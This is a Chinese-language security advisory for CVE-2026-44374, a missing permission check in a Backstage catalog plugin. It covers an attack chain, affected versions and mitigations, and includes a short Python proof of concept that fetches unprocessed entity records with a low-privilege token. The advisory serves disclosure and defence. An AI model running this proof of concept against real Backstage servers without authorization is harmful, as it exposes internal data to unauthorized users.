IPBUF安全漏洞报告
English
CVE-2026-44374 CVSS 4.3 中危

CVE-2026-44374 Backstage信息泄露漏洞

披露日期: 2026-05-14
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-44374
漏洞类型
权限绕过/信息泄露
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Backstage (plugin-catalog-backend-module-unprocessed)

相关标签

权限绕过信息泄露BackstageIDORCVE-2026-44374

漏洞概述

Backstage是一个用于构建开发者门户的开源框架。在0.6.11版本之前,@backstage/plugin-catalog-backend-module-unprocessed模块的未处理实体读取端点未强制执行权限授权检查。这导致任何经过身份验证的用户都可以绕过所有权限制,访问未处理的实体记录,造成信息泄露风险。

技术细节

该漏洞源于Backstage插件@backstage/plugin-catalog-backend-module-unprocessed在处理读取未处理实体记录的请求时,缺少必要的权限授权逻辑。在受影响的版本中,应用程序仅验证了用户是否已登录,但未检查用户是否有权访问特定的实体资源。攻击者只需拥有一个低权限的合法账户,即可通过网络发送请求到相关端点,成功获取本应受保护的未处理实体数据。这属于典型的水平越权漏洞,破坏了系统的访问控制模型。

攻击链分析

STEP 1
侦察与认证
攻击者注册或获取一个普通的低权限账户,从而获得有效的身份认证令牌。
STEP 2
发送恶意请求
攻击者利用该令牌,直接向未经授权的/api/catalog/unprocessed-entities端点发送GET请求。
STEP 3
数据获取
由于后端未进行权限校验,服务器返回所有未处理的实体记录,导致敏感信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-44374: Backstage Information Disclosure # This script demonstrates unauthorized access to unprocessed entities. import requests def check_vulnerability(target_url, auth_token): # The endpoint that is vulnerable endpoint = "/api/catalog/unprocessed-entities" headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } try: response = requests.get(target_url + endpoint, headers=headers) if response.status_code == 200: print("[+] Vulnerability confirmed! Data retrieved:") print(response.text) else: print(f"[-] Failed to retrieve data. Status: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}") # Usage # check_vulnerability("http://localhost:7007", "<YOUR_VALID_TOKEN>")

影响范围

@backstage/plugin-catalog-backend-module-unprocessed < 0.6.11
@backstage/plugin-catalog-unprocessed-entities-common < 0.0.15
@backstage/plugin-catalog-unprocessed-entities < 0.2.30

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用受影响的插件模块,或者通过网络访问控制列表(ACL)限制对Backstage服务的访问,仅允许受信任的管理员IP访问,以防止内部普通用户利用此漏洞获取数据。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表